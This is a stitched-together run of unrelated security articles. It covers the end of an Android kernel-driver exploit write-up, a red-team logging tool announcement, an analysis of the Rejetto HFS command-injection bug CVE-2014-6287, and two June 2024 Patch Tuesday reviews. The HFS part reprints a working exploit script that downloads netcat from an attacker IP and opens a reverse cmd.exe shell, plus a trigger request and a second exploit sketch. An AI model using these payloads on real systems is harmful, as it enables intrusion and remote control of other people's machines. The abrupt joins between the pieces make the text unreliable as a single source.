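    execlp("/system/bin/sh", "sh", (char *)NULL); /* root shell */
}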

Conclusion

I discovered significant security vulnerabilities across all 3 of the evaluated devices. It is highly likely that reviewing more devices comprising a greater spread of chipset manufacturers would lead to the discovery of additional vulnerabilities. Android regularly uses higher-privileged processes to liaise between applications and kernel drivers, meaning that most kernel drivers cannot be seen from an unprivileged app context (the GPU being the most obvious exception to this rule). Nevertheless, a determined attacker could use vulnerabilities in other more privileged processes to pivot into contexts from which the attack surface of these kernel drivers becomes reachable. This pivot strategy could widen the attack surface beyond the scope of this research.

As it becomes more difficult to find 0-days in core Android, third-party Linux kernel drivers continue to become a more and more attractive target for attackers. While the bulk of present-day detected ITW Android exploitation targets GPU drivers, it’s equally important that other third-party drivers are encouraged towards the same security standards.

There is room for improvement in the patching process across all 3 of the bugs discovered. None of the patches for these bugs met Project Zero's 90-day deadline for patches reaching end-users. This appears to largely be a result of the propagation delay from when third-party driver developers issue patches to when downstream manufacturers can incorporate those patches into Android security updates. Shortening this propagation delay (e.g. using Android APEX to ship updated kernel drivers) would go a long way to minimizing the Android driver patch gap. In addition, one of these bugs was only partially patched and remained exploitable on some devices for an additional 2 years before the security impact of the bug was assessed and publicly reported. Developers should regularly consider the security impacts of bugs, especially those reported by static analysis tools designed to detect security-relevant issues.

Finally, while cross-cache heap shaping mitigations significantly impede exploit development strategies, they don’t entirely prevent a determined attacker from exploiting kernel UAF vulnerabilities, even if the UAF’d object comes out of a dedicated slab cache. In this particular case, second-order allocations in a UAF’d object lead to powerful and exploitable primitives. Developers may be able to mitigate this technique by setting pointers to NULL, even if the parent object is about to get freed anyway. However, this exploit technique demonstrates that even well-designed mitigations (such as SLAB_VIRTUAL) come with limitations in an era where an attacker can achieve undetected memory corruption. It will take more fundamental mitigations that address the root issue of memory corruption, like MTE, in order to dramatically raise the bar for attackers.

Resources

This research was presented at ShmooCon; a video is available at https://archive.org/details/shmoocon2024/Shmoocon2024-SethJenkins-Driving_Forward_in_Android_Drivers.mp4

The proof of concept exploit code developed and presented in this research is available at:

https://bugs.chromium.org/p/project-zero/issues/detail?id=2470#c4

Stepping Stones – A Red Team Activity Hub

Executive Summary

NCC Group is pleased to open source a new tool built to help Red Teams log their activity for later correlation with the Blue Team's own logging. What started as a simple internal web-based data-collection tool has grown to integrate with Cobalt Strike and BloodHound to improve the accuracy and ease of activity recording. As the tool became integral to how NCC Group's Full Spectrum Attack Simulation (FSAS) team delivered Red and Purple Team assessments, additional functionality such as reporting plugins and credential analysis has grown the tool into something we believe could benefit the wider Red Teaming community.

Access the code at: https://github.com/nccgroup/SteppingStones

Features

Activity Recording

At the heart of Stepping Stones are “Events”, which describe a specific Red Team action between a source and a target. They can be annotated with MITRE ATT&CK IDs, tags, or the raw command-line evidence, but the original design philosophy was to make data capture as effortless as possible, so none of these are mandatory; this allows data to be entered “in the heat of battle” rather than retrospectively.

Additionally, files can be dropped onto an Event to record where artifacts have been placed (allowing more effective post-job clean-up) and to generate file hashes for Blue Team reporting.

Cobalt Strike Integration

Stepping Stones includes a bot which can connect to your Cobalt Strike team server and stream activity into Stepping Stones. This is held in a separate area of the application so that only the relevant activity can be “cherry-picked” and escalated into a reportable Event. This cherry-picking workflow also applies to other types of ingested activity, such as PowerShell transcripts imported via the bespoke EventStream format.

Alternatively, as beacons are spawned the source/target dropdowns for Events are updated with any new hosts, users and processes so that Events can also be manually recorded against the compromised systems.

Having access to real-time Cobalt Strike activity facilitates other functionality such as being able to notify (via webhooks) when a beacon first connects, or mark one as “watched” so that a Red Team operator can be re-notified should a dormant beacon reconnect, e.g. when a victim powers on their laptop the next day. Beacons and their associated activity can alternatively be excluded from the UI, reports and notifications if they match configurable patterns that identify them as the result of internal testing rather than genuine victim activity.

BloodHound Integration

To further improve the accuracy of sources and targets Stepping Stones can connect to BloodHound’s Neo4j database and use the data within to suggest users and hosts.

Again, with this integration in place a number of other features were subsequently added to make the life of the Red Team operator easier: there is a tree view of the domains' OU structure in Stepping Stones based on the BloodHound data, allowing a more familiar hierarchical target-selection view of the graph data. Similarly, Stepping Stones facilitates building wordlists from text in BloodHound to help crack those accounts whose password is derived from the account name or a comment on the user in AD.

Credentials

A successful Red Team operation will come across a number of passwords, secrets and hashes on the way to meeting its objectives. Managing these can be cumbersome, and the Credentials area of Stepping Stones aims to alleviate that. Hashes and passwords can be extracted from raw tool output or the streamed Cobalt Strike activity, and any associated compromised accounts can be marked as “owned” within BloodHound automatically.

Features from https://github.com/crypt0rr/pack/ have been re-implemented to generate likely wordlists and hashcat masks from previously cracked data.

A graphical dashboard provides further insight into the patterns used for passwords, generating graphs for statistics like those produced by https://github.com/digininja/pipal and comparisons against the https://haveibeenpwned.com/ breached passwords.

Architecture

Stepping Stones has been “dog fooded” by the FSAS team throughout its multi-year development and has been able to happily scale up to multi-month jobs. However, the system aims to still be useful even if not integrated with Cobalt Strike/BloodHound.

It is a Python Django web application which can run on either Windows or Linux. The philosophy is to deploy a fresh instance for each engagement, as it supports multiple users, but not multiple engagements. The database is currently SQLite, allowing all data for that engagement to be archived without cross-contamination between jobs or a build-up of multiple jobs' worth of sensitive data.

Full installation and upgrade steps can be found in the readme file.

[CVE-2014-6287] Rejetto HTTP File Server Remote Command Execution Vulnerability Analysis

Author: k0shl. Please credit the source when reposting: https://whereisk0shl.top


Vulnerability Description


Software download:
https://sourceforge.net/projects/hfs/files/HFS/2.3b/ (thanks to @1195011908 for correcting the download link)

PoC:

#!/usr/bin/python
# Exploit Title: HttpFileServer 2.3.x Remote Command Execution
# Google Dork: intext:"httpfileserver 2.3"
# Date: 04-01-2016
# Remote: Yes
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://rejetto.com/
# Software Link: http://sourceforge.net/projects/hfs/
# Version: 2.3.x
# Tested on: Windows Server 2008 , Windows 8, Windows 7
# CVE : CVE-2014-6287
# Description: You can use HFS (HTTP File Server) to send and receive files.
#          It's different from classic file sharing because it uses web technology to be more compatible with today's Internet.
#          It also differs from classic web servers because it's very easy to use and runs "right out-of-the box". Access your remote files, over the network. It has been successfully tested with Wine under Linux. 
  
#Usage : python Exploit.py <Target IP address> <Target Port Number>
 
#EDB Note: You need to be using a web server hosting netcat (http://<attackers_ip>:80/nc.exe).  
#          You may need to run it multiple times for success!
 
 
import urllib2
import sys
 
try:
    def script_create():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+save+".}")
 
    def execute_script():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe+".}")
 
    def nc_run():
        urllib2.urlopen("http://"+sys.argv[1]+":"+sys.argv[2]+"/?search=%00{.+"+exe1+".}")
 
    ip_addr = "192.168.44.128" #local IP address
    local_port = "443" # Local Port number
    vbs = "C:\Users\Public\script.vbs|dim%20xHttp%3A%20Set%20xHttp%20%3D%20createobject(%22Microsoft.XMLHTTP%22)%0D%0Adim%20bStrm%3A%20Set%20bStrm%20%3D%20createobject(%22Adodb.Stream%22)%0D%0AxHttp.Open%20%22GET%22%2C%20%22http%3A%2F%2F"+ip_addr+"%2Fnc.exe%22%2C%20False%0D%0AxHttp.Send%0D%0A%0D%0Awith%20bStrm%0D%0A%20%20%20%20.type%20%3D%201%20%27%2F%2Fbinary%0D%0A%20%20%20%20.open%0D%0A%20%20%20%20.write%20xHttp.responseBody%0D%0A%20%20%20%20.savetofile%20%22C%3A%5CUsers%5CPublic%5Cnc.exe%22%2C%202%20%27%2F%2Foverwrite%0D%0Aend%20with"
    save= "save|" + vbs
    vbs2 = "cscript.exe%20C%3A%5CUsers%5CPublic%5Cscript.vbs"
    exe= "exec|"+vbs2
    vbs3 = "C%3A%5CUsers%5CPublic%5Cnc.exe%20-e%20cmd.exe%20"+ip_addr+"%20"+local_port
    exe1= "exec|"+vbs3
    script_create()
    execute_script()
    nc_run()
except:
    print """[.]Something went wrong..!
    Usage is :[.] python exploit.py <Target IP address>  <Target Port Number>
    Don't forgot to change the Local IP address and Port number on the script"""

Run the script directly and enter the command you want to execute.


This is a command injection vulnerability. In hfs.exe, the filtering rules are not enforced strictly, so the %00 truncation character can be used to bypass the detection mechanism and execute the command that follows, achieving arbitrary command execution. A detailed analysis of the vulnerability follows.


Vulnerability Analysis


Here we use ?search=%00{.exec|calc.} as the test input. First, hfs.exe receives the search request string at address 00403282.

0:000> g
Breakpoint 3 hit
eax=0012e5b0 ebx=0012f620 ecx=0000000d edx=010c78e8 esi=0012e5b0 edi=010c78e8
eip=00403282 esp=0012e598 ebp=00000016 iopl=0         nv up ei ng nz na po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000283
hfs_exe_unpacked_+0x3282:
00403282 df3c11          fistp   qword ptr [ecx+edx] ds:0023:010c78f5=0000000000637c63
0:000> dc 010c78ef
010c78ef  652e7b00 7c636578 00000063 00000000  .{.exec|c.......
010c78ff  00000000 0c7ef900 431e6401 00000000  ......~..d.C....
010c790f  4355fc00 cebf0000 d066d800 cebf3800  ..UC......f..8..
010c791f  00000800 000060ff 00000000 0c7f4900  .....`.......I..
010c792f  00000001 00000000 53464800 4449535f  .........HFS_SID
010c793f  332e303d 37323730 31303031 30323631  =0.3072710011620
010c794f  00003730 0c815100 00000001 00001a00  07...Q..........
010c795f  72623c00 d6bbb23e bbd6b3a7 d3acbaf2  .<br>...........
0:000> dc edx
010c78e8  72616573 003d6863 78652e7b 637c6365  search=.{.exec|c

The string is received at 010c78e8. In fact, the function enclosing this address inspects the received GET parameters and dispatches to different code logic accordingly; here it receives the content of ?search.

Next, the program enters a regular-expression match, where the received parameter content is filtered.

.text:00509828                 push    ebx
.text:00509829                 push    0
.text:0050982B                 mov     ecx, offset dword_50986C
.text:00509830                 mov     edx, offset a__ ; "\\{[.:]|[.:]\\}|\\|"
.text:00509835                 mov     eax, [ebp+var_4]
.text:00509838                 call    sub_50A848

During this process, the parameters following search are iterated over one by one, which is the key reason the vulnerability can be triggered. At address 00509830, the regular-expression string is loaded for the match. Matched content is then escaped, so that commands cannot be executed.

For example, when we supply a normal search parameter:

0:000> g
Breakpoint 1 hit
eax=00d135c8 ebx=00579ecc ecx=0000002f edx=00000003 esi=00000003 edi=00000030
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d135c8  65722e7b 63616c70 7c227c65 6f757126  {.replace|"|&quo
00d135d8  207c3b74 32312326 652e3b33 26636578  t;| {.exec&
00d135e8  34323123 6c61633b 34232663 2e7d3b36  #124;calc.}.

We can see that the relevant parts have been escaped. However, %00 is not checked here: by default, the string is simply truncated at %00, so this can be used to bypass the filtering.
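Concretely, the bypass boils down to a single HTTP request of the following shape (target address illustrative):

GET /?search=%00{.exec|calc.} HTTP/1.1
Host: 192.168.44.128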

0:000> bp 00509147 ".if(@eax == 0x00d22728){;}.else{g;}"

0:000> g
(344.348): Unknown exception - code 0eedfade (first chance)
(344.348): Unknown exception - code 0eedfade (first chance)
eax=00d22728 ebx=00579ecc ecx=0000000c edx=00000004 esi=00000003 edi=0000000d
eip=00509147 esp=0012f04c ebp=0012f088 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
hfs_exe_unpacked_+0x109147:
00509147 e84c7d0000      call    hfs_exe_unpacked_+0x110e98 (00510e98)
0:000> dc eax
00d22728  652e7b00 7c636578 636c6163 00007d2e  .{.exec|calc.}..

Here we can see that the processed string has not been escaped and is passed through directly, which is what causes the vulnerability. Next:

int __stdcall sub_5096E0(signed int a1, int a2)
{
  int result; // eax@2
  int savedregs; // [sp+Ch] [bp+0h]@2

  if ( a1 <= 50 )
  {
    sub_508ECC(&savedregs);
    result = sub_509418((int)&savedregs);
  }
  return result;
}

The program then enters sub_5096E0 to process the string. This “processing” splits exec and calc apart, mainly so that exec can be matched later and calc then executed. First:

0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405987 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5987:
00405987 7f11            jg      hfs_exe_unpacked_+0x599a (0040599a)     [br=0]
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00000003 esi=0000000c edi=0000000d
eip=00405989 esp=0012f020 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x5989:
00405989 01c2            add     edx,eax
0:000> p
eax=00d22728 ebx=0000000b ecx=00000009 edx=00d2272b esi=0000000c edi=0000000d
eip=0040598b esp=0012f020 ebp=0012f044 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000206
hfs_exe_unpacked_+0x598b:
0040598b 8b442408        mov     eax,dword ptr [esp+8] ss:0023:0012f028=0012f080
0:000> dc edx
00d2272b  63657865 6c61637c 007d2e63 007c5c00  exec|calc.}..\|.
00d2273b  d2310100 00000000 00000c00 53464800  ..1..........HFS
00d2274b  cfc5d03d d0d0d6a2 d00000c4 0000edb1  =...............
00d2275b  d1c00000 00000100 00001000 74706f00  .............opt
00d2276b  2e6e6f69 6d6d6f63 3d746e65 31000031  ion.comment=1..1
00d2277b  d1c00000 00000100 00000e00 4c505500  .............UPL
00d2278b  2044414f 55534552 0053544c 00000000  OAD RESULTS.....
00d2279b  d1c00000 00000100 00000e00 524c4100  .............ALR

Here the {. portion of the string is processed, yielding a new string. Continue tracing:

0:000> g
Breakpoint 8 hit
eax=010c3150 ebx=0012ed54 ecx=636c6163 edx=010c2af0 esi=010c3150 edi=010c2af0
eip=00403324 esp=0012ed00 ebp=0012ed34 iopl=0         nv up ei ng nz ac pe cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000297
hfs_exe_unpacked_+0x3324:
00403324 c3              ret
0:000> dc eax
010c3150  636c6163 6c610000 00650063 010c2960  calc..alc.e.`)..
010c3160  00000001 0000000b 72616553 cb3d6863  ........Search=.
010c3170  00f7cbd1 010c2960 00000001 0000000b  ....`)..........
010c3180  646c6f46 c43d7265 00bcc2bf 010c2960  Folder=.....`)..
010c3190  00000001 00000009 6b636142 bbb5b73d  ........Back=...
010c31a0  312d00d8 010c2960 00000001 0000000b  ..-1`)..........
010c31b0  b73d7055 c9d8bbb5 00e3b2cf 010c2960  Up=.........`)..
010c31c0  00000001 00000009 656d6f48 d2d7ca3d  ........Home=...
0:000> dc 010c2b68
010c2b68  63657865 78650000 00006365 010c2960  exec..exec..`)..
010c2b78  00cc49a0 00000007 70747468 002f2f3a  .I......http://.
010c2b88  00650031 010c2960 00000001 00000009  1.e.`)..........
010c2b98  454d4954 46454c20 00000054 010c2a71  TIME LEFT...q*..
010c2ba8  00000000 00000007 45464552 00524552  ........REFERER.
010c2bb8  00454d49 010c2960 00000001 00000008  IME.`)..........

By setting a memory-write breakpoint, we can see that after processing, exec and calc have been separated. Next, the program enters the function sub_52CE88, which copies the calc string.

int __usercall sub_52CE88@<eax>(int a1@<eax>, int a2@<edx>, int a3@<ebx>)
{
  int v3; // esi@1
  int v4; // ecx@1
  int v5; // ecx@1
  int v6; // ecx@1
  int v7; // ebx@3
  int *v8; // ecx@5
  unsigned int v10; // [sp-Ch] [bp-1Ch]@1
  void *v11; // [sp-8h] [bp-18h]@1
  int *v12; // [sp-4h] [bp-14h]@1
  int v13; // [sp+8h] [bp-8h]@1
  int v14; // [sp+Ch] [bp-4h]@1
  int savedregs; // [sp+10h] [bp+0h]@1

  v13 = 0;
  v3 = a2;
  v14 = a1;
  __linkproc__ LStrAddRef();
  v12 = &savedregs;
  v11 = &loc_52CF19;
  v10 = __readfsdword(0);
  __writefsdword(0, (unsigned int)&v10);
  __linkproc__ LStrAsg(v4, v14);

After this step completes, we continue single-stepping.

.text:00537063 loc_537063:                             ; CODE XREF: sub_535540+1B16j
.text:00537063                 mov     eax, [ebp+var_4]
.text:00537066                 mov     edx, offset aExec ; "exec"
.text:0053706B                 call    @@LStrCmp       ; __linkproc__ LStrCmp
.text:00537070                 jnz     short loc_537079
.text:00537072                 push    ebp
.text:00537073                 call    sub_5328E8

Here the program performs a match against exec; if the match succeeds, it executes the following call sub_5328E8.

Breakpoint 3 hit
eax=010c3f78 ebx=00d07ad0 ecx=63657865 edx=00538970 esi=00000003 edi=00000006
eip=0053706b esp=0012edb4 ebp=0012f044 iopl=0         nv up ei ng nz ac po cy
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000293
hfs_exe_unpacked_+0x13706b:
0053706b e8e8e7ecff      call    hfs_exe_unpacked_+0x5858 (00405858)
0:000> dc eax
010c3f78  63657865 253d0000 00263030 010c2960  exec..=%00&.`)..
010c3f88  00000002 00000009 63657865 6c61637c  ........exec|cal
010c3f98  00260063 010c2960 00000001 00000007  c.&.`)..........
010c3fa8  6165733f 00686372 00000000 0d3d7364  ?search.....ds=.
010c3fb8  616e650a 2d656c62 7263616d 793d736f  .enable-macros=y
010c3fc8  0a0d7365 2d657375 74737973 692d6d65  es..use-system-i
010c3fd8  736e6f63 7365793d 696d0a0d 696d696e  cons=yes..minimi
010c3fe8  742d657a 72742d6f 793d7961 0a0d7365  ze-to-tray=yes..
0:000> dc edx
00538970  63657865 00000000 ffffffff 00000014  exec............
00538980  a8b6e8c9 d8b55049 c4b5b7d6 c8b6d9cb  ....IP..........
00538990  c6d6decf 00000000 00000000 447a0000  ..............zD

As we can see, both string pointers being compared, eax and edx, point to exec, meaning the string match succeeds; execution then proceeds into sub_5328E8.

.text:00532AD9 loc_532AD9:                             ; CODE XREF: sub_5328E8+D7j
.text:00532AD9                 mov     eax, [ebp+arg_0]
.text:00532ADC                 push    eax
.text:00532ADD                 lea     edx, [ebp+var_2C]
.text:00532AE0                 mov     eax, [ebp+arg_0]
.text:00532AE3                 mov     eax, [eax-10h]
.text:00532AE6                 call    sub_52CE88
.text:00532AEB                 mov     eax, [ebp+var_2C]
.text:00532AEE                 mov     ecx, 5
.text:00532AF3                 mov     edx, [ebp+var_4]
.text:00532AF6                 call    sub_50CEC4

At address 00532AF6, the function sub_50CEC4 is called. This is the execution function; let's look at its pseudocode.

char *__usercall sub_50CEC4@<eax>(_BYTE *a1@<eax>, int a2@<edx>, signed __int32 a3@<ecx>)
{
  nShowCmd = _InterlockedExchange((volatile signed __int32 *)&v46, a3);

      if ( v46
        && (v20 = nShowCmd,
            v21 = (const CHAR *)__linkproc__ LStrToPChar(),
            v22 = (const CHAR *)__linkproc__ LStrToPChar(),
            (unsigned int)ShellExecuteA(0, "open", v22, v21, 0, v20) > 0x20) )
      {

The pseudocode internally calls the ShellExecuteA function, executing an arbitrary command.

To summarize the whole process: while handling the received search parameter, the program performs a regex-based encoding pass, but that pass does not handle %00 and mistakenly treats %00 as the end of the string. This allows the regex filtering to be bypassed, so that in the subsequent parsing exec is matched as the command macro and an arbitrary command is executed.
```
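For context, this is the classic trigger for the bypass described above, widely documented against HFS 2.3's search parameter. Below is an illustrative Python sketch with a placeholder host and the calculator payload from the analysis; the literal %00 stops the macro filter's scan, while the later template parser still executes {.exec|calc.}:

import socket

# Placeholder target; an HFS 2.3x instance listening on port 80.
HOST, PORT = "192.168.1.10", 80

# The raw request is sent over a socket so the %00 and {.} macro
# characters reach the server exactly as written.
request = (
    "GET /?search=%00{.exec|calc.} HTTP/1.1\r\n"
    f"Host: {HOST}\r\n"
    "Connection: close\r\n"
    "\r\n"
)

with socket.create_connection((HOST, PORT)) as s:
    s.sendall(request.encode())
    print(s.recv(4096).decode(errors="replace"))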

Only one critical issue disclosed as part of Microsoft Patch Tuesday

Microsoft released its monthly security update Tuesday, disclosing 49 vulnerabilities across its suite of products and software.  

Of those, only one is a critical vulnerability; every other security issue disclosed this month is considered "important."

The lone critical security issue is CVE-2024-30080, a remote code execution vulnerability due to a use-after-free (UAF) issue in the HTTP handling function of Microsoft Message Queuing (MSMQ) messages.  

An adversary can send a specially crafted malicious MSMQ packet to an MSMQ server, potentially allowing them to perform remote code execution on the server side. Microsoft considers this vulnerability “more likely” to be exploited. 

There is also a remote code execution vulnerability in Microsoft Outlook, CVE-2024-30103. By successfully exploiting this vulnerability, an adversary can bypass Outlook registry block lists and enable the creation of malicious DLL (Dynamic Link Library) files. However, the adversary must be authenticated using valid Microsoft Exchange user credentials. Microsoft has also mentioned that the Outlook application Preview Pane is an attack vector. 

The company also disclosed a high-severity elevation of privilege vulnerability in the Azure Monitor Agent (CVE-2024-35254). An unauthenticated adversary with read access permissions can exploit this vulnerability to perform arbitrary file and folder deletion on a host where the Azure Monitor Agent is installed. This vulnerability does not disclose confidential information, but it could allow the adversary to delete data, which could result in a denial of service. 

CVE-2024-30077, a high-severity remote code execution vulnerability in Microsoft OLE (Object Linking and Embedding), could also be triggered if an adversary tricks an authenticated user into attempting to connect to a malicious SQL server database via a connection driver (OLE DB or OLEDB). This could result in the database returning malicious data that could cause arbitrary code execution on the client.  

The Windows Wi-Fi driver also contains a high-severity remote code execution vulnerability, CVE-2024-30078. An adversary can exploit this vulnerability by sending a malicious networking packet to an adjacent system employing a Wi-Fi networking adapter, which could enable remote code execution. However, to exploit this vulnerability, an adversary must be near the target system to send and receive radio transmissions.  

CVE-2024-30063 and CVE-2024-30064 are high-severity elevation of privilege vulnerabilities in the Windows Distributed File System (DFS). An adversary who successfully exploits these vulnerabilities could gain elevated privileges through a vulnerable DFS client, allowing the adversary to locally execute arbitrary code in the kernel. However, an adversary must be locally authenticated to exploit these vulnerabilities by running a specially crafted application.  

Talos would also like to highlight a few more high-severity elevation of privilege vulnerabilities that Microsoft considers "more likely" to be exploited. 

CVE-2024-30068 is an elevation of privilege vulnerability in the Windows kernel that could allow an adversary to gain SYSTEM-level privileges. By exploiting this vulnerability from a low-privilege AppContainer, an adversary can elevate their privileges and execute code or access resources at a higher integrity level than that of the AppContainer execution environment. However, the adversary must first log in to the system and then run a specially crafted application that exploits the vulnerability to take control of an affected system.  

There are three high-severity elevation of privilege vulnerabilities — CVE-2024-30082, CVE-2024-30087 and CVE-2024-30091 — in Win32k kernel drivers that exist because of an out-of-bounds (OOB) issue. An adversary who exploits CVE-2024-30082 could gain SYSTEM privileges, while exploiting CVE-2024-30087 or CVE-2024-30091 would grant the rights of the user running the affected application. Microsoft considers these vulnerabilities "more likely" to be exploited. 

CVE-2024-30088 and CVE-2024-30099 are two high-severity elevation of privilege vulnerabilities in NT kernel drivers that Microsoft considers "more likely" to be exploited. Successful exploitation would grant an adversary the privileges of the local user and SYSTEM, respectively.  

Mskssrv, a Microsoft Streaming Service kernel driver, also contains two elevation of privilege vulnerabilities: CVE-2024-30089 and CVE-2024-30090. An adversary successfully exploiting these vulnerabilities could gain SYSTEM privileges.   

CVE-2024-30084 and CVE-2024-35250 are two more high-severity elevation of privilege vulnerabilities, in the Windows kernel-mode driver, that Microsoft considers "more likely" to be exploited. An adversary could gain SYSTEM privileges by successfully exploiting these vulnerabilities, but they must first win a race condition. 

A complete list of all the vulnerabilities Microsoft disclosed this month is available on its update page.  

In response to these vulnerability disclosures, Talos is releasing a new Snort rule set that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Secure Firewall customers should use the latest update to their rule set by updating their SRU. Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

The rules included in this release that protect against the exploitation of many of these vulnerabilities are 63581 - 63591, 63596 and 63597. There are also Snort 3 pre-processor rules 300937 - 300940.

The June 2024 Security Update Review

Somehow, we’ve made it to the sixth patch Tuesday of 2024, and Microsoft and Adobe have released their regularly scheduled updates. Take a break from your regular activities and join us as we review the details of their latest security alerts. If you’d rather watch the full video recap covering the entire release, you can check it out here:

Adobe Patches for June 2024

For June, Adobe released 10 patches addressing 165(!) CVEs in Adobe Cold Fusion, Photoshop,  Experience Manager, Audition, Media Encoder, FrameMaker Publishing Server, Adobe Commerce, Substance 3D Stager, Creative Cloud Desktop, and Acrobat Android. The fix for Experience Manager is by far the largest with a whopping 143 CVEs addressed. However, all but one of these bugs are simply cross-site scripting (XSS) vulnerabilities. The patch for Cold Fusion fixes two bugs, but neither are code execution bugs. That’s the same case for the patch addressing bugs in Audition. The fix for Media Encoder has a single OOB Read memory leak fixed. The update for Photoshop also has just one bug – a Critical-rated code execution issue. That’s also the story for the Substance 3D Stager patch.

The patch for FrameMaker Publishing Server has only two bugs, but one is a CVSS 10 and the other is a 9.8. If you’re using this product, this should be the first patch you test and deploy. The patch for Commerce should also be high on your test-and-deploy list as it corrects 10 bugs, including some Critical-rated code execution vulns. The patch for Creative Cloud Desktop fixes a single code execution bug. Finally, the patch for Acrobat Android corrects two security feature bypasses.

None of the bugs fixed by Adobe this month are listed as publicly known or under active attack at the time of release. Adobe categorizes these updates as a deployment priority rating of 3.

Microsoft Patches for June 2024

This month, Microsoft released 49 CVEs in Windows and Windows Components; Office and Office Components; Azure; Dynamics Business Central; and Visual Studio. If you include the third-party CVEs being documented this month, the CVE count comes to 58. A total of eight of these bugs came through the ZDI program, and that does include some of the cases reported during the Pwn2Own Vancouver contest in March.

Of the new patches released today, only one is rated Critical, and 48 are rated Important in severity. This release is another small release when compared to the monster that was April.

Only one of the CVEs listed today is listed as publicly known, but that’s actually just a third-party update that’s now being integrated into Microsoft products. Nothing is listed as being under active attack. Let’s take a closer look at some of the more interesting updates for this month, starting with the lone Critical-rated patch for this month:

-       CVE-2024-30080 – Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability
This update receives a CVSS rating of 9.8 and would allow remote, unauthenticated attackers to execute arbitrary code with elevated privileges of systems where MSMQ is enabled. That makes this wormable between those servers, but not to systems where MSMQ is disabled. This is similar to the “QueueJumper” vulnerability from last year, but it’s not clear how many affected systems are exposed to the internet. While it is likely a low number, now would be a good time to audit your networks to ensure TCP port 1801 is not reachable.  

-       CVE-2024-30103 – Microsoft Outlook Remote Code Execution Vulnerability
This patch corrects a bug that allows attackers to bypass Outlook registry block lists and enable the creation of malicious DLL files. While not explicitly stated, attackers would likely then use the malicious DLL files to perform some form of DLL hijacking for further compromise. The good news here is that the attacker would need valid Exchange credentials to perform this attack. The bad news is that the exploit can occur in the Preview Pane. Considering how often credentials end up being sold in underground forums, I would not ignore this fix.  

-       CVE-2024-30078 – Windows Wi-Fi Driver Remote Code Execution Vulnerability
This vulnerability allows an unauthenticated attacker to execute code on an affected system by sending the target a specially crafted network packet. Obviously, the target would need to be in Wi-Fi range of the attacker and using a Wi-Fi adapter, but that’s the only restriction. Microsoft rates this as “exploitation less likely” but considering it hits every supported version of Windows, it will likely draw a lot of attention from attackers and red teams alike.

Here’s the full list of CVEs released by Microsoft for June 2024:

| CVE | Title | Severity | CVSS | Public | Exploited | Type |
| --- | --- | --- | --- | --- | --- | --- |
| CVE-2024-30080 | Microsoft Message Queuing (MSMQ) Remote Code Execution Vulnerability | Critical | 9.8 | No | No | RCE |
| CVE-2024-35255 | Azure Identity Libraries and Microsoft Authentication Library Elevation of Privilege Vulnerability | Important | 5.5 | No | No | EoP |
| CVE-2024-35254 † | Azure Monitor Agent Elevation of Privilege Vulnerability | Important | 7.1 | No | No | EoP |
| CVE-2024-37325 † | Azure Science Virtual Machine (DSVM) Elevation of Privilege Vulnerability | Important | 9.8 | No | No | EoP |
| CVE-2024-35252 | Azure Storage Movement Client Library Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2024-30070 | DHCP Server Service Denial of Service Vulnerability | Important | 7.5 | No | No | DoS |
| CVE-2024-29187 * | GitHub: CVE-2024-29187 WiX Burn-based bundles are vulnerable to binary hijack when run as SYSTEM | Important | 7.3 | No | No | EoP |
| CVE-2024-35253 | Microsoft Azure File Sync Elevation of Privilege Vulnerability | Important | 4.4 | No | No | EoP |
| CVE-2024-35263 | Microsoft Dynamics 365 (On-Premises) Information Disclosure Vulnerability | Important | 5.7 | No | No | Info |
| CVE-2024-35248 | Microsoft Dynamics 365 Business Central Elevation of Privilege Vulnerability | Important | 7.3 | No | No | EoP |
| CVE-2024-35249 | Microsoft Dynamics 365 Business Central Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-30072 | Microsoft Event Trace Log File Parsing Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-30104 | Microsoft Office Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-30101 | Microsoft Office Remote Code Execution Vulnerability | Important | 7.5 | No | No | RCE |
| CVE-2024-30102 | Microsoft Office Remote Code Execution Vulnerability | Important | 7.3 | No | No | RCE |
| CVE-2024-30103 | Microsoft Outlook Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-30100 | Microsoft SharePoint Server Remote Code Execution Vulnerability | Important | 7.8 | No | No | RCE |
| CVE-2024-30097 | Microsoft Speech Application Programming Interface (SAPI) Remote Code Execution Vulnerability | Important | 8.8 | No | No | RCE |
| CVE-2024-30089 | Microsoft Streaming Service Elevation of Privilege Vulnerability | Important | 7.8 | No | No | EoP |
| CVE-2024-30090 | Microsoft Streaming Service Elevation of Privilege Vulnerability | Important | 7 | No | No | EoP |
| CVE-2023-50868 * | MITRE: CVE-2023-50868 NSEC3 closest encloser proof can exhaust CPU | Important | 7.5 | Yes | No | DoS |
